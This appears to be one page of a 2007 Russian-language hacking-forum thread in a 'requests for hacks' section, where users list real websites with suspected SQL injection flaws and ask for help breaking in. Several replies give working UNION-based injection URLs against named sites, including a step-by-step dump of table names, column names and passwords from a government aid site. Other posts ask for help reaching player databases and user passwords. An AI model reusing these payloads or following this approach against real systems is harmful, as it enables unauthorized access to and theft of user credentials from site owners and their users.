ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
Перезагрузить страницу Помощь Sql Иньекции.
   
 
Страница 8 из 41 « Первая < 4 5 6 7 8 9 10 11 12 18 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 14.07.2007, 23:56
V1p-eR
Познающий
Регистрация: 02.07.2007
Сообщений: 34
Провел на форуме:
446543

Репутация: 29
По умолчанию
Цитата:
Сообщение от Y.Dmitriy  
не могу найти поля логинов
Код:
http://transport.su/news.php?rub=5&id=-23283+union+select+1,2,3,4,5,6,7,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,name,login,password,icq,id),0x7a),0x7a),9,10+from+users+limit+0,1/*
 

  #72  
Старый 15.07.2007, 00:08
V1p-eR
Познающий
Регистрация: 02.07.2007
Сообщений: 34
Провел на форуме:
446543

Репутация: 29
По умолчанию
Цитата:
Сообщение от hitex  
http://www.ipodmania.ru/index.php?state=catalogs&activeCategory='182
что-то никак не осилю)
Код:
http://www.ipodmania.ru/index.php?state=catalogs&activeCategory=181+union+select+version(),user()/*
данные на страничке не выводятся, в исходном посмотри...
 

  #73  
Старый 15.07.2007, 14:01
dudits
Banned
Регистрация: 02.06.2007
Сообщений: 42
Провел на форуме:
263861

Репутация: 6
По умолчанию
http://info.l2r.ru/?part=items&id=1+or+1=@@version--

что здесь можно сделать?

необходимо получить доступ к бд игроков,

помогите я в долгу не останусь.
Последний раз редактировалось dudits; 16.07.2007 в 18:57..
 

  #74  
Старый 19.07.2007, 02:40
CarnoPhage
Новичок
Регистрация: 08.07.2007
Сообщений: 3
Провел на форуме:
55576

Репутация: 0
По умолчанию
http://88.200.143.97/stat/stats.php?game=W3XP&user=wWw334'

Вот тут вроде что то есть, но не могу ничего путного сделать, максимум что сделал, вот это:

http://88.200.143.97/stat/stats.php?game=W3XP&user=-wWw334'+union++select+uid+from+pvpgn_BNET+where+ac ct_username=1/*

есть таблицы:

"acct_username varchar(32)","NULL"
"acct_userid int","NULL"
"acct_passhash1 varchar(128)","NULL"
"acct_email varchar(128)","NULL"
 

  #75  
Старый 29.07.2007, 17:04
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию
http://shanson.alkar.net/news.php?detail='
http://games.alkar.net/game/cs/servstat/?sid='
можно что-то сделать?
 

  #76  
Старый 18.08.2007, 09:01
najort
Новичок
Регистрация: 14.08.2007
Сообщений: 9
Провел на форуме:
24643

Репутация: 1
По умолчанию
http://www.pief.ru/?id=
не php, a asp
 

  #77  
Старый 18.08.2007, 14:27
Moldman
Участник форума
Регистрация: 12.06.2007
Сообщений: 153
Провел на форуме:
1990548

Репутация: 58
Отправить сообщение для Moldman с помощью ICQ Отправить сообщение для Moldman с помощью AIM Отправить сообщение для Moldman с помощью MSN Отправить сообщение для Moldman с помощью Yahoo
По умолчанию
http://nepal.usaid.gov/program.php?pid=
 

  #78  
Старый 19.08.2007, 23:16
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию
Вот так иньекция работает. Тут пятая версия, поетому с именами проблем нету.
http://nepal.usaid.gov/story.php?id=-41%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(ta ble_name%20,0x17),0x17),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20fro m%20information_schema.tables%20limit%2056,1/*&pid=52
А вот так получаешь явки и пароли
http://nepal.usaid.gov/story.php?id=-41%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(co lumn_name%20,0x17),0x17),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20fr om%20information_schema.columns%20where%20table_na me=CHAR(106,95,117,115,101,114,115)%20limit%204,1/*&pid=52
Лимит дает доступ к разным полям, я показал название одного из полей.
А вот и данные
http://nepal.usaid.gov/story.php?id=-41%20union%20select%201,password,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28%20from%20j_users/*&pid=52
(Только заметил что можно без AES_DECRYPT AES_ENCRYPT но не всегда). Пользуйся. Вот только куда эти данные подставлять я не нашел, нету там входа никакого!
 

  #79  
Старый 02.10.2007, 21:03
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
По умолчанию
Цитата:
http://shanson.alkar.net/news.php?detail='
http://games.alkar.net/game/cs/servstat/?sid='
можно что-то сделать?
имхо ничё. там не скуля
 

  #80  
Старый 05.10.2007, 11:40
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию
хм... если прошарил все базы где есть таблицы Users, где есть поле Passwd, делаю выборку пароля по Username, а пароль не показывается.. + в хтмл коде сайта его нет. что можно еще сделать?
 
 
Страница 8 из 41 « Первая < 4 5 6 7 8 9 10 11 12 18 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ